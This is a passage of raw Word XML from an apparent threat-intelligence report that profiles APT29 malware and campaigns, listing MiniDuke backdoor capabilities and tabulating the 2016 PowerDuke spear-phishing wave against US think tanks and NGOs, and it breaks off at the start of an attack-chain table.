    <w:p w14:paraId="74AB56C6" w14:textId="69DD1F56" w:rsidR="00F7052A" w:rsidRPr="00F7052A" w:rsidRDefault="006C0A11" w:rsidP="00943C83">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Mini</w:t>
      </w:r>
      <w:r w:rsidR="00F7052A" w:rsidRPr="00F7052A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Duke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D964277" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>Finally, this malware implements thirty-eight different backdoor functions such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6880BE59" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>• Uploading or downloading files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E13447C" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>• Creating processes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34370EF5" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t xml:space="preserve">• Getting system information (hostname, ID, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pipename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, HTTP method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F45928A" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>• Getting the list of local drives and their type (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nrt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rmv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, fix, net, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cdr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, ram, und)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B138130" w14:textId="77777777" w:rsidR="00F7052A" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>• Reading and writing in the named pipe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ECD236" w14:textId="77777777" w:rsidR="00683C9D" w:rsidRDefault="00F7052A" w:rsidP="00F7052A">
      <w:r>
        <w:t>• Starting and stopping the proxy feature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE7C71" w14:textId="77777777" w:rsidR="00683C9D" w:rsidRDefault="00683C9D" w:rsidP="00F7052A"/>
    <w:p w14:paraId="3B88FB1B" w14:textId="702E1EEA" w:rsidR="00683C9D" w:rsidRPr="00F7052A" w:rsidRDefault="00683C9D" w:rsidP="00683C9D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Fat</w:t>
      </w:r>
      <w:r w:rsidRPr="00F7052A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Duke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60B2AB53" w14:textId="377CA7C8" w:rsidR="00F26597" w:rsidRDefault="00F26597" w:rsidP="00F7052A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F0B903" w14:textId="151EFBE8" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Toc153480856"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">T1156.001, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022561D">
        <w:t>PowerDuke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022561D">
        <w:t>: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Wave 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
    </w:p>
    <w:p w14:paraId="42F67292" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">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22561D" w:rsidRPr="002D1D50" w14:paraId="2FCEAD5C" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="039613A6" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="58" w:name="OLE_LINK3"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Dimension</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7C7B28" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="002D1D50" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="558D7BAE" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00387DCC">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="040D468E" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26DD7286" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attribution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="187F38D4" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>APT29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63B3CEB1" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="21FE3BE7" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C58586E" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="007328DE" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34453932" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="007328DE" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">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5EB006B5" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The second attack wave that </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Volexity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="007418B5">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve"> observed leveraged a Microsoft Word document with a malicious embedded macro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="2604C6CB" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314CC0D8" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Attack Origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="688EF396" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="007328DE" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Russia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F23A885" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Via ATT&amp;CK/TCERT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="36792E4E" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="204B105F" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ABFCFF2" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>US</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B99630A" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] T</w:t>
            </w:r>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>he Dukes launched several waves of highly targeted spear phishing attacks against several U.S.-based think tanks and NGOs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="3DE01039" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61F23E9A" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="255872BD" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F2362">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>U.S.-based think tank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D367980" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00387DCC" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="47D424B6" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57DB23B0" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CF4EDA2" w14:textId="46DCD8A6" w:rsidR="0022561D" w:rsidRPr="00515289" w:rsidRDefault="00515289" w:rsidP="00D23EEA">
            <w:r>
              <w:t>Exfiltration (confidentiality)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B4D1966" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="6D5BB531" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30913EF9" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F299CAA" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A6C072B" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="52F20ADA" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7242F7F5" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E2F6639" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B7141B1" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="0837699E" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A972816" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03E99423" w14:textId="5AFBD36F" w:rsidR="0022561D" w:rsidRDefault="00A46AC8" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32E4A269" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="0DBD9D12" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50DB9336" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12AB5D08" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="531CAA49" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="3B288518" w14:textId="77777777" w:rsidTr="00D23EEA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E3F7A41" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2441EABA" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD6B69E" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[6] Wave 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="58"/>
    </w:tbl>
    <w:p w14:paraId="1C86BE51" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00AC7A85" w:rsidRDefault="0022561D" w:rsidP="0022561D"/>
    <w:p w14:paraId="783FDFAC" w14:textId="77777777" w:rsidR="0022561D" w:rsidRDefault="0022561D" w:rsidP="0022561D">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r>
        <w:t>Attack Technique Chain (Initial Access)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10201" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="441"/>
        <w:gridCol w:w="1322"/>
        <w:gridCol w:w="2344"/>
        <w:gridCol w:w="638"/>
        <w:gridCol w:w="591"/>
        <w:gridCol w:w="566"/>
        <w:gridCol w:w="975"/>
        <w:gridCol w:w="3324"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022561D" w:rsidRPr="002D1D50" w14:paraId="6B1B4B4B" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
